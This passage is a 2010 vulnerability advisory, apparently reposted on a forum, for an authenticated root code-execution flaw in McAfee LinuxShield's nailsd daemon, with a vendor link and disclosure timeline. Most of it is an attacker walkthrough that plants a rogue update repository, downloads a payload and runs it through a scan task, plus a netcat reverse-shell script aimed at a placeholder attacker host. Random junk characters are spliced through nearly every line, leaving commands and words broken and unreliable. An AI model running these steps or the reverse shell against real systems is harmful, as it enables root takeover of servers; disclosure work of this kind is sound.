      r# F" g3 F# T0 }. S: b/ a' H$ p( cnetwork, incorporating as many protective measures as possible.# G1 @4 S) t; [$ g

      K% A$ T1 C. z9 m+ W4 g6 m1 V: l3 VLinuxShield uses a web-browser interface, and a large number of1 I& x' n8 S- k* Z
    LinuxShield installations can be centrally controlled by ePolicy1 J  D( j' o% [
    Orchestrator.  r, {, X: \- R8 h* F1 Z7 m
    3 ^2 w9 G6 g$ D: q. X% D
    (Product description from LinuxShield Product Guide)
    % B  t$ [: G, f$ v! Z5 v. A& d
    ' _$ |$ U/ I2 B
    $ j9 O6 o( K$ \* T8 }8 d/ t/ S1 _
    Description:
    : _3 ~1 V( i5 j. ^2 T============
    ' V( f. R: b& c3 G( j2 _4 u' {/ k& {0 O, ^0 G1 G
    This vulnerability allows remote attackers to execute arbitrary code
    ' Q6 q7 R& D) p* Ton vulnerable installations of McAfee LinuxShield. User interaction- ^( Y5 i# e+ v
    is not required to exploit this vulnerability but an attacker must  P7 f7 w* ~2 I7 C
    be authenticated.
    ; Y4 a, w; c; K% F7 g% U" l2 t/ H8 \- h) v' w
    The LinuxShield Webinterface communicates with the localy installed! a4 j$ i- H3 [, P. x; Z
    "nailsd" daemon, which listens on port 65443/tcp, to do
    % E' K, @2 z  J3 I% Z# ]* aconfiguration, E2 Y3 J1 f3 S2 g) m$ c1 k
    changes, query the configuration and execute tasks.
    6 p9 }3 Y" ^# y3 q! B
    & B% ]) Q* Z  u; ]+ R  n. MEach user, which can login to the victim box, can also authenticate
    & U: ?+ H$ ]5 r1 w7 qit self to the "nailsd" and can do configuration changes and" y7 C9 L0 X$ |6 S" y
    execute% x3 @$ C1 J% D+ c  c. F  a
    tasks with root privileges.
    ' Q: Z& i+ ~/ E" ^! A
    % r$ |" a, ^8 r( b! `* WA direct execution of commands is not possible, but it is possible to
    7 ^7 t; Y4 f# [8 |download and execute code through manipulation of the config and7 L, X& l4 M& C* }$ Y
    execute schedule tasks of the LinuxShield.
    / p; s; {- h4 q( H7 Y& z8 |1 D1 ?: B
    3 J" L' w  ^- `' U1 z% o3 K8 z7 f- t- j
    walk-through (after the TLS handshake):
    . P* k2 |. F3 U" J1 Y5 O$ Y# a! s+--------------------------------------! h0 d* n7 X" m! x. B) {

    % j6 V: R) d$ k% l2 Z  T8 {nailsd > +OK welcome to the NAILS Statistics Service
    ! ~3 F# E2 \! D2 O% j/ L0 X6 N% Sattacker> auth <user> <pass>
    $ d, U: M% e" z9 bnailsd > +OK successful authentication+ m: i2 V0 G& N5 ~: |: R
    " G; T  r' P' ~* g: N, R
    # Set the Attacker repository to download our code from a httpd6 }2 p3 {+ [* U6 l0 L
    # (catalog.z)4 _5 \8 A& {; K$ {4 G
    #---------------------------------------------------------------
    3 d% }, G+ v; o; Gattacker> db set 1 _table=repository status=1 siteList=<?xml version& d8 F, u$ {2 j! [$ n( _$ Q; Y9 B$ ^& D
    ="1.0" encoding="UTF-8"?><ns:SiteLists
    ; S! m$ m3 d, M; o3 ]xmlns:ns="naSiteLi
    7 l2 Y8 w) I! [  l3 C/ pst" GlobalVersion="20030131003110"  m! N( @8 L' ?4 K/ j' M
    LocalVersion="200912098 S! u1 |5 ]7 s* j+ t: D
    161903" Type="Client"><SiteList
    - }9 `+ Y! I$ ZDefault="1" Name="SomeGU) {  a* T& S7 M
    ID"><HttpSite Type="repository"/ J5 Z8 c  E- V; h. S& }1 \; e$ Q
    Name="EvilRepo" Order="1" R7 D6 K; [" Y2 j2 w# \' f- ~& c9 m
    " Server="<attackerhost>:80"% c9 Z! `- ]% F! S8 t
    Enabled="1" Local="1"><Rela
    - J3 i8 c; b: t% E- M* b# o
    : x, s( K! ~8 x8 dtivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    - h+ j$ k" z1 r7 W3 lrName></' K7 L: a9 l% y
    UserName><Password3 ^0 V* ^6 F  C# }
    Encrypted="0"/></HttpSite></SiteList></4 p$ @1 M6 }) v1 u7 S& q- i2 w
    ns:SiteLists> _cmd=update# m6 W* l1 G# P6 A8 P! @
    nailsd > +OK database changes buffered.  l. a0 |8 |) U, k6 E

    1 P2 c9 _* |: |" p% E7 G0 g# Execute task to set the attacker repository
    5 Y' H7 w" P1 K7 c#---------------------------------------------------------------( B# h, j8 @1 p& b+ S. [
    attacker> task setsitelist
    8 Z  Z4 W. L$ i: |" \+ Dnailsd > +OK setting sitelist from CMA.6 F$ k  d. g- m4 O( ?

    ) y6 {, P. ?0 x# Execute the default Update task to download the code
    # ~' ^# U9 d9 U+ w! b#---------------------------------------------------------------5 ]7 U/ z. V7 b: Z8 G0 U
    attacker> task nstart LinuxShield Update3 S4 J( T3 B- h& t; C5 I3 p
    nailsd > +OK task LinuxShield Update starting
    9 E6 f* l7 x( a* E# M
    ( y/ b2 D2 e8 b8 n+ v# Create a Scan profile, which executes our code. The profiles are
    1 U* V1 k% {: x8 u& g% G# not stored in the database." x+ d8 {8 q3 P/ y% Y* A. l# A; E8 L
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    + N- m* z/ u" p, V- S9 J6 E#---------------------------------------------------------------
    * r- b+ i1 a# s# R. }( o) [attacker> sconf ODS_99 begin- Q/ x% M3 W: g5 o: f) S2 S
    nailsd > +OK 12604008884 A) @- H2 ~' s- [
    # m5 e2 g4 O8 v+ z+ b
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the$ m* i2 a/ H1 N3 `% r9 z
    path" ^4 g9 Y$ A. `; H
    # where our earlier downloaded catalog.z file is stored.
    ; K! P7 |( `& T5 r# (/opt/McAfee/cma/scratch/update/catalog.z)
    # I  p! g/ c, }2 K. V5 t4 P/ W#---------------------------------------------------------------
    " `& \  g  e6 _1 ?! U7 tattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=3 P, z# l* I5 k* F
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    3 Y0 ~" ]+ t2 c3 b+ yDS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=, W9 ?! ?, t% ]  _# T, o0 R
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng1 `+ [9 W! Z: j3 m& o
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro9 ^+ a& P- M6 T3 h: \
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    3 n- H! N% z3 K  H3 air=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    , p% ^  y2 G5 g5 j+ P9 jginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd5 k7 N5 e7 E4 X5 B
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    1 R! p% q3 \9 O1 T, ^' oristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    ' `8 ]6 X" }0 L& ce nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    ! a9 L' P/ n# B/ Z+ c" I. Y.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    8 M& i. x2 V( N. Jle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    , k) o9 |0 A1 E- p% e8 zdren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    " i& D6 n4 h, C4 i# me nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    2 \. D( S- e- J$ [9 y; S- C  X5 rofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    ' c7 \/ C, [  `o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile& k! j: [& \% z5 S$ Y! d
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    ' a# @- t# G& K4 i' N5 a) h2 yrue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat" P8 K7 q) i0 V+ K9 S9 J+ {% ~
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    / a) [) S+ M. X3 y6 t8 z00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    $ N5 j2 f- M- h9 w  u( X* n' |ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil0 ~9 O3 f+ w8 @0 y  q  @0 |8 U
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    9 i; `4 P2 Q1 S; A! X" h  Nnailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr' e% f- t# z  {
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil
    6 E6 v9 J6 ~' }! _/ ke.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_999 ]# N/ c! P  v  N8 x8 |& B
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    ; l$ F% S6 K: x8 a7 naction.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    * B* g2 U2 S  M" V% N1 @3 Yecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa+ |; j. j" Z# \# h" H8 n- v- H! C) f
    ss nailsd.profile.ODS_99.action.error=Block/ g2 T6 t; u0 _# T
    nailsd > +OK configuration changes buffered
    + \4 u: |( a0 F$ O$ l5 [attacker> sconf ODS_99 commit 1260400888
    8 L, o; i, h% a6 Y2 T3 Nnailsd > +OK configuration changes stored
    ( g/ K! n' q5 r$ E1 s
    + V, q) A7 |9 \# Set a scan task with the manipulated profile to execute the code9 E+ K: p4 u" i# _2 K( f
    #---------------------------------------------------------------: y1 G6 l/ X+ S* U1 ?. c) o6 X
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    8 p' }- [. W/ P1 Cpe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t# N! N+ f- f1 N+ t/ Y7 b3 \  c: V
    mp;exclude:false timetable=type=unscheduled taskResults=0 i* D- \, L3 S  J5 F. M, T
    _lastRun=1260318482 status=Stopped _cmd=insert$ l  Y& T' Z6 {4 ~0 t) X$ n
    nailsd > +OK database changes buffered
    5 W' a4 b& H9 \) Q7 s0 p  J' X
    ; K* n4 M" Q4 j& G7 o5 r1 S  o# Execute scan task to execute the code6 i$ y1 _- f$ x8 v, C; e
    #---------------------------------------------------------------
    2 B: w% [& T& f0 e$ c! v! U' Y$ ^attacker> task nstart Evil Task
    # q9 M6 P4 n0 d8 N) O" V- B; s: |+ G* y  n1 {  t0 T) I/ w; p$ m
    +-------------------------------------- walk-through EOF
    5 A) S9 G5 Q1 H, B' k% l, ~( A! V4 S  b5 Q. X) V: k3 s; s; x
    9 P) S) T  ~9 L+ S4 E! q% ^8 [
    To get a reverse root shell place something like this in the catalog.z  F. m6 {# m: D

    $ U7 f. d7 Z( ?9 d) {--- snip ---6 F2 n; B% A2 k* a7 [
    #!/bin/sh
    ) g* Y2 e  z; T3 E% G9 g" lnc -nv <attacker_host> 4444 -e /bin/sh4 X; q- q$ y% l; H0 N, }, x6 Q
    --- /snip ---& I1 J* `3 }* |4 h+ k9 B3 O
    . X1 B6 d3 ~. p0 u6 g$ @% s( @

    ( v" `( I7 P3 {, n1 s9 S4 V+ w: X# d. J3 G/ ~0 z; D6 x* S5 X
    Proof of Concept :% R9 Q- `6 u# ]# Q
    ==================6 g) {8 V, X+ y+ R7 T

    7 F* X' _! t0 Jhttp://inj3ct0r.com/sploits/11165.tar.gz/ g! A# M( W7 S- N) e
    & Q4 y- X0 E- ]7 T' ?# w

    , B6 s+ m6 [  t. P6 |) Q
    9 I& F4 [: t9 y3 K. eSolution:/ @9 ~% b" j' v( c6 M4 W7 _, ?
    =========
    3 O- B+ P- Y& g* p2 p
    * s9 L& X- b1 p0 t9 XMcAfee Advisory0 z5 X9 D3 U# s# N
    +--------------
    7 q5 \+ u9 l: g3 e( qhttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    6 }3 ]" b3 j; s# z7 Q2 c$ B# O
    6 G) r* B. N; z4 M# D$ B2 ~
    ( s# e) Q$ Z( ?0 Z7 j) d( d- O* z7 x5 b) ~4 `, U
    Disclosure Timeline (YYYY/MM/DD):$ F% d- t4 |0 r9 I; j
    =================================
    5 `. q+ S& D  X0 l, l# N# y9 h1 \* r4 Y7 k8 ?' _; H
    2009.12.07: Vulnerability found
    $ \/ I* |7 b' r+ ?" b! [2010.02.03: Asked vendor for a PGP key
    8 o. [- d% W5 P# P& k/ y+ ^2010.02.05: Vendor sent his PGP key- ^4 u7 V/ n& m
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure2 u6 ~( `; k( ]! j0 v& K+ ]
    date (2010.02.18) to Vendor
    & x+ I7 s: J& w  Y2010.02.05: Vendor acknowledges the reception of the advisory
    - P  m7 f9 g4 Y* l2010.02.16: Ask for a status update, because the planned release date is. i9 [! G  s' e* `* y/ G
    2010.02.18.# R2 I0 z0 U: D$ a) C% V' E
    2010.02.16: Vendor response that, they are currently working on a patch; {' w8 P& H) I+ j* W/ q
    2010.02.17: Changed release date to 2010.02.25.2 W3 y; N1 ]' y: H! t0 N+ f
    2010.02.22: Vendor gives a status update, that they are able to release
      E% y4 O6 E! {! n0 r1 cthe patch on 2010.02.25., X! O; @3 ?) B/ p* D
    2010.02.24: Ask for a list of affected products and the advisory url.
    8 e9 e# z- M2 k2010.02.24: Vendor sends the list.
    / w  r' ~& D0 Y! L" N/ @2010.03.02: Release of this Advisory
    + L/ g* R' r& Q, }  u! R; m- t( s2 p- N5 }( |, H
    ' P( O% d6 }, l" v% B- @

    % \0 t) s( Y  ^9 p* S3 f
    . z1 w' v8 _+ y' g) @  e3 `* j+ \* h  x+ b  K& z0 J. u8 v
    0 L! n" a3 Q4 H4 {4 N$ U
    ) f( }  [, h7 C2 _: k: s  R1 r# h! N
    , q% N3 t, p- j' d" L9 N1 q

    9 }! r  `  k- j
    $ t6 v) R6 J: y' d5 I  z* a& u: \
    3 ~& e/ d, E7 b8 c
      L2 H0 ~3 l, H' `# O4 F) V; H/ }
    ) p" q4 C' i' n

    7 f  S0 ~" ]" X# j% g& b4 m
    ) ^! \# t  M/ W) U2 J. k2 q+ d) g# ]- r' a3 I/ w7 Z$ Q
    - W1 j& F) N7 A) J9 j$ L( Y

    7 T- R# F/ @) |7 ~/ p1 K( ^9 D# `9 X' C* Z6 ^

      @5 k$ S" Z: P' i" d  U0 E. k+ O公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表